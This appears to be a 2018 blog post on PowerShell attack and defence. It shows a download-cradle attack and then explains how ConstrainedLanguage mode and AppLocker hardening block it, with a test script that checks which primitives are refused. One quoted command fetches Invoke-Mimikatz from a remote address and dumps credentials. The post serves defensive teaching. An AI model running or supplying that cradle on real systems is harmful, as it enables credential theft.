PowerShell Offensive & Defensive View

February 12, 2018


Hi

As we know, PowerShell can be much more than a scripting platform, especially once administrative rights are involved.

Running unsigned processes and scripts lets an attacker advance another step toward their objective.

Mimikatz and other painful tools are usually spotted by antivirus and antimalware products, but when they bypass those controls we are exposed to one of the most suspicious attack patterns seen in PowerShell today.

Using an IEX download cradle to fetch a new file is one of them.

Simply upload the PS script and run the following:

 

"IEX (New-Object Net.WebClient).DownloadString('https://192.168.1.1/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds"

 

 

PowerShell can limit access to the above command by using Language Mode.

 

FullLanguage – permits all language elements in the session:

$ExecutionContext.SessionState.LanguageMode = "FullLanguage"

 

ConstrainedLanguage – permits all Windows cmdlets and all PowerShell language elements, but it limits the permitted types, which blocks direct .NET scripting, Win32 API calls via Add-Type, and interaction with COM objects:

$ExecutionContext.SessionState.LanguageMode = "ConstrainedLanguage"

 

It is highly recommended to harden the above with an AppLocker control policy via GPO, so that local administrators cannot change it.
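To see what ConstrainedLanguage actually refuses, here is an added check (not code from the original post): it opens a separate runspace forced into ConstrainedLanguage and runs each building block of the cradle pattern above inside it. It assumes Windows PowerShell 5.1 or later and only reads the local process list; the URL from the post is never contacted.

```powershell
# Added example, not code from the original post: run the building blocks of the
# IEX cradle above inside a separate ConstrainedLanguage runspace and report which
# ones PowerShell refuses. No download happens; New-Object Net.WebClient is
# rejected before any request could be made.

$iss = [System.Management.Automation.Runspaces.InitialSessionState]::CreateDefault()
$iss.LanguageMode = [System.Management.Automation.PSLanguageMode]::ConstrainedLanguage
$rs = [System.Management.Automation.Runspaces.RunspaceFactory]::CreateRunspace($iss)
$rs.Open()

function Test-InConstrainedMode {
    param([string]$Label, [string]$Script)
    $ps = [PowerShell]::Create()
    $ps.Runspace = $rs
    [void]$ps.AddScript($Script)
    try {
        $out = $ps.Invoke()
        if ($ps.HadErrors) {
            # Non-terminating error: the cmdlet ran but the language mode refused the request
            $reason = $ps.Streams.Error[0].Exception.Message
            [pscustomobject]@{ Check = $Label; Blocked = $true; Detail = $reason }
        } else {
            [pscustomobject]@{ Check = $Label; Blocked = $false; Detail = ($out | Out-String).Trim() }
        }
    } catch {
        # Terminating error raised by the engine (e.g. a disallowed .NET method call)
        [pscustomobject]@{ Check = $Label; Blocked = $true; Detail = $_.Exception.Message }
    } finally {
        $ps.Dispose()
    }
}

# Constructed checks: one allowed cmdlet pipeline, then the primitives the cradle relies on
$checks = @(
    @{ Label = 'Language mode seen by the script'; Script = '$ExecutionContext.SessionState.LanguageMode' }
    @{ Label = 'Cmdlet pipeline (allowed)';         Script = 'Get-Process -Id $PID | Select-Object -ExpandProperty Name' }
    @{ Label = 'New-Object Net.WebClient (cradle)'; Script = '(New-Object Net.WebClient).GetType().Name' }
    @{ Label = 'Direct .NET constructor call';      Script = '[System.Net.WebClient]::new().GetType().Name' }
    @{ Label = 'Add-Type (compiled .NET code)';     Script = 'Add-Type -TypeDefinition "public class X { }"' }
)

$checks | ForEach-Object { Test-InConstrainedMode -Label $_.Label -Script $_.Script } |
    Format-Table -AutoSize -Wrap

$rs.Close()
```

The Blocked column shows the cmdlet pipeline passing while the WebClient, direct .NET and Add-Type rows fail, which is exactly the part of the cradle that ConstrainedLanguage removes; the AppLocker policy is what stops a local administrator from flipping the mode back.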
